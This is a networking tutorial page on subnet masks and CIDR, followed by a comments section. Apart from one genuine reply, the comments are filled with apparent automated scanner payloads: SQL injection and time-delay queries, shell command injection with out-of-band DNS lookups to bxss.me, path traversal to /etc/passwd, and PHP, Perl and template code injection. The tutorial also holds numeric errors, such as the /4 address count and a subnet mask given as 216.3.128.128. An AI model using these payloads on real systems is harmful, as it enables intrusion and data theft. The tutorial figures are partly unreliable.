What is a Subnet Mask?
An IP address has two components, the network address and the host address. A subnet mask separates the IP address into the network and host addresses (<network><host>). Subnetting further divides the host part of an IP address into a subnet and host address (<network><subnet><host>) if additional subnetwork is needed. Use the Subnet Calculator to retrieve subnetwork information from IP address and Subnet Mask. It is called a subnet mask because it is used to identify network address of an IP address by perfoming a bitwise AND operation on the netmask.
A Subnet mask is a 32-bit number that masks an IP address and divides the IP address into network address and host address. Subnet Mask is made by setting network bits to all "1"s and setting host bits to all "0"s. Within a given network, two host addresses are reserved for a special purpose, and cannot be assigned to hosts. The "0" address is assigned a network address and "255" is assigned to a broadcast address, and they cannot be assigned to hosts.
Examples of commonly used netmasks for classed networks are 8-bits (Class A), 16-bits (Class B), and 24-bits (Class C), and classless networks are as follows:
| Class | Address | # of IP | Netmask (Binary) | Netmask (Decimal) |
|---|---|---|---|---|
| CIDR | /4 | 240,435,456 | 11110000 00000000 00000000 00000000 | 240.0.0.0 |
| CIDR | /5 | 134,217,728 | 11111000 00000000 00000000 00000000 | 248.0.0.0 |
| CIDR | /6 | 67,108,864 | 11111100 00000000 00000000 00000000 | 252.0.0.0 |
| CIDR | /7 | 33,554,432 | 11111110 00000000 00000000 00000000 | 254.0.0.0 |
| A | /8 | 16,777,216 | 11111111 00000000 00000000 00000000 | 255.0.0.0 |
| CIDR | /9 | 8,388,608 | 11111111 10000000 00000000 00000000 | 255.128.0.0 |
| CIDR | /10 | 4,194,304 | 11111111 11000000 00000000 00000000 | 255.192.0.0 |
| CIDR | /11 | 2,097,152 | 11111111 11100000 00000000 00000000 | 255.224.0.0 |
| CIDR | /12 | 1,048,576 | 11111111 11110000 00000000 00000000 | 255.240.0.0 |
| CIDR | /13 | 524,288 | 11111111 11111000 00000000 00000000 | 255.248.0.0 |
| CIDR | /14 | 262,144 | 11111111 11111100 00000000 00000000 | 255.252.0.0 |
| CIDR | /15 | 131,072 | 11111111 11111110 00000000 00000000 | 255.254.0.0 |
| B | /16 | 65,534 | 11111111 11111111 00000000 00000000 | 255.255.0.0 |
| CIDR | /17 | 32,768 | 11111111 11111111 10000000 00000000 | 255.255.128.0 |
| CIDR | /18 | 16,384 | 11111111 11111111 11000000 00000000 | 255.255.192.0 |
| CIDR | /19 | 8,192 | 11111111 11111111 11100000 00000000 | 255.255.224.0 |
| CIDR | /20 | 4,096 | 11111111 11111111 11110000 00000000 | 255.255.240.0 |
| CIDR | /21 | 2,048 | 11111111 11111111 11111000 00000000 | 255.255.248.0 |
| CIDR | /22 | 1,024 | 11111111 11111111 11111100 00000000 | 255.255.252.0 |
| CIDR | /23 | 512 | 11111111 11111111 11111110 00000000 | 255.255.254.0 |
| C | /24 | 256 | 11111111 11111111 11111111 00000000 | 255.255.255.0 |
| CIDR | /25 | 128 | 11111111 11111111 11111111 10000000 | 255.255.255.128 |
| CIDR | /26 | 64 | 11111111 11111111 11111111 11000000 | 255.255.255.192 |
| CIDR | /27 | 32 | 11111111 11111111 11111111 11100000 | 255.255.255.224 |
| CIDR | /28 | 16 | 11111111 11111111 11111111 11110000 | 255.255.255.240 |
| CIDR | /29 | 8 | 11111111 11111111 11111111 11111000 | 255.255.255.248 |
| CIDR | /30 | 4 | 11111111 11111111 11111111 11111100 | 255.255.255.252 |
Subnetting an IP network is to separate a big network into smaller multiple networks for reorganization and security purposes. All nodes (hosts) in a subnetwork see all packets transmitted by any node in a network. The performance of a network is adversely affected under heavy traffic load due to collisions and retransmissions.
Applying a subnet mask to an IP address separates network address from host address. The network bits are represented by the 1's in the mask, and the host bits are represented by 0's. Performing a bitwise logical AND operation on the IP address with the subnet mask produces the network address. For example, applying the Class C subnet mask to our IP address 216.3.128.12 produces the following network address:
IP: 1101 1000 . 0000 0011 . 1000 0000 . 0000 1100 (216.003.128.012)
Mask: 1111 1111 . 1111 1111 . 1111 1111 . 0000 0000 (255.255.255.000)
---------------------------------------------
1101 1000 . 0000 0011 . 1000 0000 . 0000 0000 (216.003.128.000)
Subnetting Network
Here is another scenario where subnetting is needed. Pretend that a web host with a Class C network needs to divide the network so that parts of the network can be leased to its customers. Let's assume that a host has a network address of 216.3.128.0 (as shown in the example above). Let's say that we're going to divide the network into 2 and dedicate the first half to itself, and the other half to its customers.
216 . 3 . 128 . (0000 0000) (1st half assigned to the web host) 216 . 3 . 128 . (1000 0000) (2nd half assigned to the customers)
The web host will have the subnet mask of 216.3.128.128 (/25). Now, we'll further divide the 2nd half into eight block of 16 IP addresses.
216 . 3 . 128 . (1000 0000) Customer 1 -- Gets 16 IPs (14 usable) 216 . 3 . 128 . (1001 0000) Customer 2 -- Gets 16 IPs (14 usable) 216 . 3 . 128 . (1010 0000) Customer 3 -- Gets 16 IPs (14 usable) 216 . 3 . 128 . (1011 0000) Customer 4 -- Gets 16 IPs (14 usable) 216 . 3 . 128 . (1100 0000) Customer 5 -- Gets 16 IPs (14 usable) 216 . 3 . 128 . (1101 0000) Customer 6 -- Gets 16 IPs (14 usable) 216 . 3 . 128 . (1110 0000) Customer 7 -- Gets 16 IPs (14 usable) 216 . 3 . 128 . (1111 0000) Customer 8 -- Gets 16 IPs (14 usable) ----------------------------- 255 . 255 . 255 . (1111 0000) (Subnet mask of 255.255.255.240)
You may use Subnet Calculator to ease your calculation.
CIDR - Classless Inter Domain Routing
Classless InterDomain Routing (CIDR) was invented to keep the Internet from running out of IP Addresses. The IPv4, a 32-bit, addresses have a limit of 4,294,967,296 (232) unique IP addresses. The classful address scheme (Class A, B, and C) of allocating IP addresses in 8-bit increments can be very wasteful. With a classful addressing scheme, a minimum number of IP addresses allocated to an organization is 256 (Class C). Giving 256 IP addresses to an organization only requiring 15 IP addresses is wasteful. Also, an organization requiring more than 256 IP addresses (let's say 1,000 IP addresses) is assigned a Class B, which allocates 65,536 IP addresses. Similarly, an organization requiring more than 65,636 (65,634 usable IPs) is assigned a Class A network, which allocates 16,777,216 (16.7 Million) IP addresses. This type of address allocation is very wasteful.
With CIDR, a network of IP addresses is allocated in 1-bit increments as opposed to 8-bits in the classful network. The use of a CIDR notated address can easily represent classful addresses (Class A = /8, Class B = /16, and Class C = /24). The number next to the slash (i.e. /8) represents the number of bits assigned to the network address. The example shown above can be illustrated with CIDR as follows:
216.3.128.12, with subnet mask of 255.255.255.128 is written as 216.3.128.12/25 Similarly, the 8 customers with the block of 16 IP addresses can be written as: 216.3.128.129/28, 216.3.128.130/28, and etc.
With the introduction of the CIDR addressing scheme, IP addresses are more efficiently allocated to ISPs and customers; and hence there is less risk of IP addresses running out anytime soon. For detailed specifications on CIDR, please review RFC 1519. With the introduction of additional gaming, medical, appliance, and telecom devices requiring static IP addresses in addition to more than 6.5 billion (July 2006 est.) world population, the IPv4 addresses with CIDR addressing scheme will eventually run out. To solve the shortage of IPv4 addresses, the IPv6 (128-bit) address scheme was introduced in 1993.
Author
IP Location has made every attempt to ensure the accuracy and reliability of the information provided on this website. However, the information is provided "as is" without warranty of any kind. IP Location does not accept any responsibility or liability for the accuracy, content, completeness, legality, or reliability of the information contained on this website.
Comments (4)
Your subnet chart is incorrect. It states that a /24 network has 256 hosts. It actually has 254 hosts with a subnet address and a broadcast address.
Oct 06, 2015 at 09:55 AM555
555
555
555
555
1CRLAdRosnO
555
555
HMa2rsm8
555
555
response.write(9801351*9151926)
555
'+response.write(9801351*9151926)+'
"+response.write(9801351*9151926)+"
555
555
555
555
555
555
555
555
555
555
555
12345'"\'\");|]*{ <>''????
555
555
555
555
echo lrvtzf$()\ qtpbwd\nz^xyu||a #' &echo lrvtzf$()\ qtpbwd\nz^xyu||a #|" &echo lrvtzf$()\ qtpbwd\nz^xyu||a #
${9999908+10000487}
555
&echo brlqil$()\ rpafme\nz^xyu||a #' &echo brlqil$()\ rpafme\nz^xyu||a #|" &echo brlqil$()\ rpafme\nz^xyu||a #
555
|echo lrcndv$()\ obfusq\nz^xyu||a #' |echo lrcndv$()\ obfusq\nz^xyu||a #|" |echo lrcndv$()\ obfusq\nz^xyu||a #
555
555
(nslookup hitlgocvwzhxf7367d.bxss.me||perl -e "gethostbyname('hitlgocvwzhxf7367d.bxss.me')")
555
555
$(nslookup hitaqovgmdhby5bfa0.bxss.me||perl -e "gethostbyname('hitaqovgmdhby5bfa0.bxss.me')")
555
555
&(nslookup hituisqtvqocea0006.bxss.me||perl -e "gethostbyname('hituisqtvqocea0006.bxss.me')")&'\"`0&(nslookup hituisqtvqocea0006.bxss.me||perl -e "gethostbyname('hituisqtvqocea0006.bxss.me')")&`'
555&n936124=v981751
555
555
555
555
|(nslookup hitkhhceostjv833aa.bxss.me||perl -e "gethostbyname('hitkhhceostjv833aa.bxss.me')")
555
555
555
`(nslookup hitxonewdbgli023e9.bxss.me||perl -e "gethostbyname('hitxonewdbgli023e9.bxss.me')")`
;(nslookup hituohypnywyd951ce.bxss.me||perl -e "gethostbyname('hituohypnywyd951ce.bxss.me')")|(nslookup hituohypnywyd951ce.bxss.me||perl -e "gethostbyname('hituohypnywyd951ce.bxss.me')")&(nslookup hituohypnywyd951ce.bxss.me||perl -e "gethostbyname('hituohypnywyd951ce.bxss.me')")
555
555
555
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
555
1some_inexistent_file_with_long_name.jpg
555
Http://bxss.me/t/fit.txt
'"()
555
)
http://bxss.me/t/fit.txt?.jpg
555
!(()&&!|*|*|
bxss.me
555
555
^(#[email protected]#$)(()))******
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
'.gethostbyname(lc('hitaj'.'wdwnctznb4803.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(97).chr(75).chr(111).chr(74).'
555
555
".gethostbyname(lc("hitfx"."kpohedsr0f1f0.bxss.me."))."A".chr(67).chr(hex("58")).chr(117).chr(73).chr(101).chr(81)."
555
555
555
555
555
555
555
555
555
555
555
HttP://bxss.me/t/xss.html?%00
"+"A".concat(70-3).concat(22*4).concat(111).concat(74).concat(121).concat(82)+(require"socket" Socket.gethostbyname("hitde"+"plwdvwou1e49f.bxss.me.")[3].to_s)+"
bxss.me/t/xss.html?%00
'+'A'.concat(70-3).concat(22*4).concat(102).concat(77).concat(101).concat(83)+(require'socket' Socket.gethostbyname('hitph'+'oiacxdoq353c4.bxss.me.')[3].to_s)+'
555
555
555
555
555
555
555
555
replyComment
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
555
555
555
replyComment
';print(md5(31337));$a='
555
";print(md5(31337));$a="
replyComment/.
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
${@print(md5(31337))}
555
555
555
/xfs.bxss.me
${@print(md5(31337))}\
555
555
555
555
'.print(md5(31337)).'
555
555
555
555
555
9dLLfemS
555
'"
555
555
555
-1 OR 2+357-357-1=0+0+0+1 --
555
555
555
-1 OR 2+286-286-1=0+0+0+1
555
-1' OR 2+54-54-1=0+0+0+1 --
555
555'"()&%
555
555
-1' OR 2+487-487-1=0+0+0+1 or 'hrQVxoGO'='
'"()&%
555
555
-1" OR 2+642-642-1=0+0+0+1 --
5559562508
555
if(now()=sysdate(),sleep(15),0)
555
555
555
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
555
555
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
555
555
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
555
555
-1; waitfor delay '0:0:15' --
555
555
-1); waitfor delay '0:0:15' --
1 waitfor delay '0:0:15' --
tB6mCXk8'; waitfor delay '0:0:15' --
-5 OR 674=(SELECT 674 FROM PG_SLEEP(15))--
-5) OR 389=(SELECT 389 FROM PG_SLEEP(15))--
-1)) OR 638=(SELECT 638 FROM PG_SLEEP(15))--
KETqaDfA' OR 855=(SELECT 855 FROM PG_SLEEP(15))--
RzBfJSMr') OR 803=(SELECT 803 FROM PG_SLEEP(15))--
kHAI8ry8')) OR 533=(SELECT 533 FROM PG_SLEEP(15))--
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
1'"
1%2527%2522
@@UeFWw
555
555
555
555
555
555
555
555
555
555
555
555
../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../windows/win.ini
555
555
555
555
WYbjK894
555
../555
555
555
555
555
response.write(9062028*9300612)
555
555
555
555
'+response.write(9062028*9300612)+'
555
555
555
555
"+response.write(9062028*9300612)+"
555
555
555
555
555
../../../../../../../../../../../../../../etc/passwd
555
555
../../../../../../../../../../../../../../windows/win.ini
555
555
555
555
${10000415+10000219}
555
555
555
555
12345'"\'\");|]*{ <>''????
../555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555&n961896=v952139
555
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
555
555
555
555
1some_inexistent_file_with_long_name.jpg
555
Http://bxss.me/t/fit.txt
555
555
555
http://bxss.me/t/fit.txt?.jpg
555
555
555
555
555
555
echo bhqfpm$()\ ywixqu\nz^xyu||a #' &echo bhqfpm$()\ ywixqu\nz^xyu||a #|" &echo bhqfpm$()\ ywixqu\nz^xyu||a #
555
555
&echo kcvrgx$()\ goulbl\nz^xyu||a #' &echo kcvrgx$()\ goulbl\nz^xyu||a #|" &echo kcvrgx$()\ goulbl\nz^xyu||a #
555
)
|echo ppygnv$()\ xlkqrf\nz^xyu||a #' |echo ppygnv$()\ xlkqrf\nz^xyu||a #|" |echo ppygnv$()\ xlkqrf\nz^xyu||a #
555
555
'"()
'.gethostbyname(lc('hitsa'.'rqmedgzuc748f.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(99).chr(88).chr(107).chr(78).'
!(()&&!|*|*|
(nslookup hitrathnrjzzt71011.bxss.me||perl -e "gethostbyname('hitrathnrjzzt71011.bxss.me')")
555
555
555
".gethostbyname(lc("hitmk"."sinyutzb4503b.bxss.me."))."A".chr(67).chr(hex("58")).chr(119).chr(67).chr(104).chr(85)."
$(nslookup hitbrhqzavtgg67f27.bxss.me||perl -e "gethostbyname('hitbrhqzavtgg67f27.bxss.me')")
555
555
^(#[email protected]#$)(()))******
555
555
&(nslookup hitwlocjfupmea9069.bxss.me||perl -e "gethostbyname('hitwlocjfupmea9069.bxss.me')")&'\"`0&(nslookup hitwlocjfupmea9069.bxss.me||perl -e "gethostbyname('hitwlocjfupmea9069.bxss.me')")&`'
555
555
555
555
|(nslookup hittukkvxcefj9ad56.bxss.me||perl -e "gethostbyname('hittukkvxcefj9ad56.bxss.me')")
555
555
555
555
555
555
`(nslookup hitfyitgoqbjk98629.bxss.me||perl -e "gethostbyname('hitfyitgoqbjk98629.bxss.me')")`
555
;(nslookup hitdjcbjgabype2371.bxss.me||perl -e "gethostbyname('hitdjcbjgabype2371.bxss.me')")|(nslookup hitdjcbjgabype2371.bxss.me||perl -e "gethostbyname('hitdjcbjgabype2371.bxss.me')")&(nslookup hitdjcbjgabype2371.bxss.me||perl -e "gethostbyname('hitdjcbjgabype2371.bxss.me')")
555
555
bxss.me
555
555
555
555
555
555
HttP://bxss.me/t/xss.html?%00
555
"+"A".concat(70-3).concat(22*4).concat(116).concat(69).concat(109).concat(89)+(require"socket" Socket.gethostbyname("hitxd"+"jldsyyel979a2.bxss.me.")[3].to_s)+"
555
555
555
555
555
'+'A'.concat(70-3).concat(22*4).concat(112).concat(87).concat(116).concat(68)+(require'socket' Socket.gethostbyname('hitvh'+'ovipdwaw0b42d.bxss.me.')[3].to_s)+'
bxss.me/t/xss.html?%00
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
555
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
555
/xfs.bxss.me
555
555
replyComment
';print(md5(31337));$a='
555
555
replyComment
555
";print(md5(31337));$a="
555
'"
${@print(md5(31337))}
replyComment/.
555
555
${@print(md5(31337))}\
555
555
'.print(md5(31337)).'
555'"()&%
555
555
555
'"()&%
555
555
555
5559968734
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
3oyHszJj
-1 OR 2+434-434-1=0+0+0+1 --
-1 OR 2+594-594-1=0+0+0+1
-1' OR 2+252-252-1=0+0+0+1 --
-1' OR 2+134-134-1=0+0+0+1 or 'AZEvznch'='
-1" OR 2+891-891-1=0+0+0+1 --
if(now()=sysdate(),sleep(15),0)
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
-1; waitfor delay '0:0:15' --
-1); waitfor delay '0:0:15' --
1 waitfor delay '0:0:15' --
KrMl8TVV'; waitfor delay '0:0:15' --
-5 OR 709=(SELECT 709 FROM PG_SLEEP(15))--
-5) OR 970=(SELECT 970 FROM PG_SLEEP(15))--
-1)) OR 888=(SELECT 888 FROM PG_SLEEP(15))--
tH91fuWg' OR 467=(SELECT 467 FROM PG_SLEEP(15))--
mLXNUpSV') OR 578=(SELECT 578 FROM PG_SLEEP(15))--
lq4oXVaP')) OR 157=(SELECT 157 FROM PG_SLEEP(15))--
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
1'"
1%2527%2522
@@RfH1W
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555'"()&%
5559936826
acu6271?s1?s2?s3?uca6271
acux10218z1z2abcxuca10218
<%={{={@{#{${acx}}%>
555
555
1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>
555
acx{{98991*97996}}xca
acx[[${98991*97996}]]xca
acx__${98991*97996}__::.x
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
555
555
555
555
555
1'"
\
1%2527%2522
@@P2dIi
JyI=
'"
''""
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
3dAmBtCw
-1 OR 2+399-399-1=0+0+0+1 --
-1 OR 2+191-191-1=0+0+0+1
-1' OR 2+185-185-1=0+0+0+1 --
-1' OR 2+963-963-1=0+0+0+1 or 'QVNcXWtz'='
-1" OR 2+379-379-1=0+0+0+1 --
414'
if(now()=sysdate(),sleep(12),0)
0'XOR(if(now()=sysdate(),sleep(12),0))XOR'Z
0"XOR(if(now()=sysdate(),sleep(12),0))XOR"Z
(select(0)from(select(sleep(12)))v)/*'+(select(0)from(select(sleep(12)))v)+'"+(select(0)from(select(sleep(12)))v)+"*/
-1; waitfor delay '0:0:12' --
-1); waitfor delay '0:0:12' --
1 waitfor delay '0:0:12' --
O8uuwRm8'; waitfor delay '0:0:12' --
-5 OR 244=(SELECT 244 FROM PG_SLEEP(12))--
-5) OR 911=(SELECT 911 FROM PG_SLEEP(12))--
-1)) OR 267=(SELECT 267 FROM PG_SLEEP(12))--
7SFbqOmi' OR 193=(SELECT 193 FROM PG_SLEEP(12))--